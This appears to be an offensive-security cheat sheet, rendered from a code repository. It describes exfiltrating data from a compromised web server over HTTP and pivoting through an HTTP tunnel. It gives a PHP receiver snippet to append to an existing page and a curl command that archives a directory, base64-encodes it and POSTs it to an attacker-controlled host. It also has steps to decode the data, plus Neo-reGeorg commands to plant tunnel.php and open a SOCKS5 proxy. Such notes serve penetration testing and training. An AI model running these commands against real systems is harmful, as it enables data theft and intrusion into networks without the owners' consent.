1004 B

Raw Blame History

HTTP/PHP Exfiltration

On a pwned web server concat the following PHP code to an existing page

<?php 
if (isset($_POST['file'])) {
        $file = fopen("/tmp/out.b64","w");
        fwrite($file, $_POST['file']);
        fclose($file);
   }
?>

POST the payload to the controlled web server

curl --data "file=$(tar zcf - <directory> | base64)" http://example.com/about.php

Prepare the stored file through removing the url encoding

sudo sed -i 's/ /+/g' /tmp/out.b64

Unarchive the data

cat /tmp/out.b64 | base64 -d | tar xvfz -

Pivot via Tunneling over HTTP

Neo-reGeorg's tool
Generate an encrypted client with a key via

python3 neoreg.py generate -k key.enc

Upload tunnel.php to the web server created
Trigger the tunnel via

python3 neoreg.py -k key.enc -u http://example.com/tunnel.php

Start socks5 via

curl --socks5 127.0.0.1:1080 http://target.example.com